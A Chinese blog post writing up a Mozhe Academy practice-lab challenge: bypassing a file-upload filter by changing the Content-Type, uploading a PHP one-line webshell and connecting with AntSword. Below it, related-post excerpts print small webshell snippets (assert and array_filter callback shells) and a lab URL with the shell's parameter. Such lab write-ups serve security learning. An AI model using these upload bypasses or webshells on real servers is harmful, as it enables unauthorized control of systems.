【墨者学院】WebShell文件上传漏洞分析溯源(第4题)

已于 2023-08-01 15:01:20 修改
阅读量852 收藏
点赞数
文章标签: 安全 web安全
于 2022-11-29 10:45:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66835614/article/details/128092425
版权

靶场:墨者学院

题目:WebShell文件上传漏洞分析溯源(第4题)

1.还是老样子,正常上传一个txt文件查看返回结果,提示此文件不允许上传。

2.正常上传图片查看返回结果,发现能够正常上传

回顾解题思路,了解HTTP请求数据包中的Content-Type、了解文件类型“MIME”;

猜测是上传文件时校验文件类型,简单做个测试,上传txt文件通过bp改包,将MIME类型更改为image/jpeg格式

成功上传

3.回归正传,既然能上传,那么将带有一句话木马的txt文件重新上传并修改后缀名为php,文件类型为image/jpeg,进行上传。

 4.放包上传查看返回结果,成功上传。 

5.通过蚁剑测试连接,成功后添加数据,拿到key(解题完成) 

总结:

1.此题考点为验证文件类型并绕过上传webshll。

2.通过图片马也能够上传,或者上传php文件都可以,前提是需符合文件类型

替补选手
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
墨者学院WebShell文件上传漏洞分析溯源
gudugeji的博客
10-22 389
1.第一 编写一句话木马,然后上传文件,改文件不可上传,改后缀为php5 然后用菜刀连接 连接成功打开html,得到flag 2.第二 上传shell图片,burp抓包,改jpg为php,点Forward,然后菜刀连接,同1 ...
墨者靶场 入门:WebShell文件上传漏洞分析溯源(第1
qq_43233085的博客
01-15 1081
墨者靶场 入门:WebShell文件上传漏洞分析溯源 第1目背景介绍实训目标解方向解步骤 目 背景介绍 某公司内部资料分享平台存在一个文件上传页面,为了保证服务器的安全,现在安全工程师“墨者”将对该上传页面进行安全检测,看是否存在安全漏洞影响服务器的安全性。 实训目标 1、了解PHP及PHP5各个版本的相关知识; 2、了解PHP上传绕过扩展名的方法; 3、了解Burpsuite的使用方...
墨者学院-WebShell文件上传漏洞分析溯源(第4)
JimWu的博客
09-05 614
WebShell文件上传漏洞分析溯源(第4) 难易程度:★★ 目类型:文件上传 使用工具:FireFox浏览器、burpsuite、菜刀 1.打开靶场,测试上传文件类型,发现txt和php文件均不行。 2.尝试上传jpg类型,发现是可以的。 3.首先尝试上传一句话图片木马,虽然上传成功,但是最后发现菜刀还是无法连接。 4.然后尝试直接上传php文件,然后修改content-type类型。 ...
墨者学院 - WebShell文件上传漏洞分析溯源(第4)
多崎巡礼的博客
07-31 556
1、先随便上传一个图片,发现是php类型的站,再分别上传.jpg、.php文件测试,发现服务器不允许上传php类型文件, 2、一句话木马写入1.php并上传,用burp代理,修改Content-Type”类型为” image/jpeg” 3、点击“Forward”或者在Repeater中的“Go”,得知文件上传后的访问地址 4、菜刀连接木马1.php,找到Key  ...
墨者WebShell文件上传漏洞分析溯源(第4)
zr1213159840的博客
12-28 248
首先还是上传一个文件看下网站是什么代码,不出意外,还是PHP 目中提及了使用MIME相关的内容,估计是通过content-type来的,我们可以直接使用bp拦截后修改即可,将原来的muma.jpg修改为如下: 点击上传,成功 使用蚁剑连接 拿到key ...
webshell文件上传漏洞分析溯源(第四)
WEB渗透测试 从入门到萌新
04-07 163
burpsite抓包修改MIME信息 Content-Type 请求的与实体对应的MIME信息 Content-Type: application/x-www-form-urlencoded
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
墨者靶场 入门:WebShell文件上传漏洞分析溯源(第2
qq_43233085的博客
01-16 969
墨者靶场 入门:WebShell文件上传漏洞分析溯源(第2目背景介绍实训目标解方向解步骤 目 背景介绍 安全工程师"墨者"在单位办公内网做日常检测时,发现某部门为了方便内部人员上传聚餐的活动图片,在某服务器上新增一简单的图片上传功能。然而这个存在一个很严重的高危漏洞。 实训目标 1、掌握浏览器对JavaScript的禁用方法; 2、掌握表单数据通过POST提交数据时,对数据的修改方法...
墨者学院_CMS系统漏洞分析溯源(第9)
weixin_50698958的博客
09-23 622
漏洞概述: 在 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ignore') import ssl ssl._
墨者学院-WebShell代码分析溯源(第4)
JimWu的博客
09-04 365
WebShell代码分析溯源(第4) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、记事本、菜刀 1.访问网页,下载网页源代码。 2.发现hack文件夹里有可疑文件bin.php 3.打开发现确实是一句话木马 能发现代码运用了回调函数,只有我们在菜刀连接时e输入的参数等于assert的密文,才能构成一句话木马病毒。 我们通过base64把assert,密文为YXNzZX...
WebShell文件上传漏洞分析溯源(墨者学院)
全村的希望
10-14 940
WebShell文件上传漏洞分析溯源
墨者学院 - WebShell代码分析溯源(第2)
多崎巡礼的博客
07-31 750
<?php  $POST['POST']='assert'; $array[]=$POST; $array[0]['POST']($_POST['assert']) ;?> assert,是php代码执行函数,与eval()有同样的功能,assert()函数中参数为表达式 (或者为函数) 因为$array[], POST[]都是数组,所以$array[]=$POST,就是...
墨者 - WebShell文件上传漏洞分析溯源(第4)
吃肉唐僧的博客
07-16 227
一开始直接上传1.php 根据目提示,Content-Type类型 用bp抓包,修改Content-Type”类型为” image/jpeg” 成功 接下来菜刀无惧链接 成功拿到key
墨者学院 - WebShell代码分析溯源(第4)
多崎巡礼的博客
08-02 697
唉让我如此信任的工具在这道上栽了跟头。。。嗯,以后的结果仅供参考。   下载源代码,在hack文件夹下发现bin.php 打开分析代码得知其为php回调函数类一句话木马 且获得其密码,通过菜刀连接 菜刀连接http://219.153.49.228:42394/www/hack/bin.php?e=YXNzZXJ0 密码为POST array_filter()函数用回调函数过...
WEBWebShell代码分析溯源(第4)
HAPPY
08-19 1179
查看到可以webshell后定位到源代码:   这个的用法: get网址中传入 ?e=YXNzZXJ0   (arrest的base64加密值为YXNzZXJ0) 菜刀连接用法: http://www.xxx.com/3.php?e=YXNzZXJ0 密码:POST 详解:base64_decode()函数主要用于base64的解码,YXNzZXJ0的base64解码后的结果为...
墨者 - WebShell代码分析溯源(第4)
吃肉唐僧的博客
07-12 269
下载文件,找到木马文件 发现一句木马变种 <?php error_reporting(0); $e=$_REQUEST['e']; $arr=array($_POST['POST'],); array_filter($arr,base64_decode($e)); ?> 这句话的意思是,获取url发过来的参数(base64加密过的)保存到$e,菜刀链接密码为POST,ar...
内部文件上传系统漏洞分析溯源墨者学院
weixin_33946020的博客
01-12 176
随便发一个允许上传的文件,BP抓包,发现网站是用asp写的2.上传图片马,连接菜刀无法解析 3.先猜测大漏洞IIS下文件解析漏洞,这主要考察怎么创建文件夹的。 例如:在a.asp文件夹下,里面的所有文件都将被看做asp文件执行,举例:123.jpg在a.asp文件夹下就会被看做123.jpg.asp来执行。 而且其实它并不算一个漏洞,在这之前微软一直没有修复这个问的原因就是,...
墨者学院 - WebShell文件上传分析溯源(第2)
多崎巡礼的博客
08-01 2320
御剑扫描网址可以得到 ip/admin/upload1.php,ip/admin/upload2.php 尝试 ip/admin/upload.php,发现直接跳转upload1.php,没有访问权限继续跳转upload2.php burpsuite抓包,截取upload.php,查看源码得到 forward一下 将uploadmd5更改为 upload_file.php 发送给re...
墨者学院-WebShell文件上传分析溯源(第2)
qq_47094508的博客
02-04 2457
拿到目后出现以下画面 使用目录扫描工具一把梭 推荐御剑 御剑 子域名挖掘机 subdomainbrute都可以 当我们尝试去访问upload1的时候会出现无权访问并跳转到302 http://219.153.49.228:49870/admin/upload1.php 从burp里面看确实上传点就在upload1.php 只要禁用js就能够上传文件 来到上传点之后我们上传一个webshell 上传成功之后并没有返回路径 通过burp...
墨者学院 windows硬盘文件分析取证(新建的用户名) 犯罪嫌疑人在使用过电脑之后并
最新发布
12-15
墨者学院的Windows硬盘文件分析取证是一种通过对电脑硬盘上的文件进行分析来获取相关信息的技术手段。当涉及到犯罪调查时,这项技术可以帮助警方揭示犯罪嫌疑人的行为轨迹和证据。 在对犯罪嫌疑人所使用的计算机进行分析取证时,我们首先需要新建一个用户名。新建用户名的目的是为了保护我们操作的隐私和安全,以免意外地影响现有的用户设置或对系统产生不可逆的影响。这个新建的用户名仅用于分析取证过程。 一旦新建了用户名,我们可以开始进行分析取证工作。首先,我们会使用专业的取证软件对硬盘进行扫描,以找到潜在的关键文件和目录。通过恢复已删除的文件和检测隐藏的文件,我们可以获取更全面的信息。 接着,我们会对文件进行深入的分析。通过文件的创建时间、修改时间、访问记录等元数据信息,我们可以了解文件的活动轨迹。此外,我们还会查找关键词、犯罪工具、恶意软件等可能存在的证据。 在整个过程中,需要确保对取证工作的记录和操作都能被完整地保存下来,以确保后续的法律程序和证据呈现的可靠性。 综上所述,墨者学院的Windows硬盘文件分析取证可以帮助调查人员揭示犯罪嫌疑人的行为痕迹和相关证据,而新建的用户名则是为了保护我们操作的隐私和安全。通过有效的电脑取证工作,我们能够为正义的伸张提供有力的证据支持。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值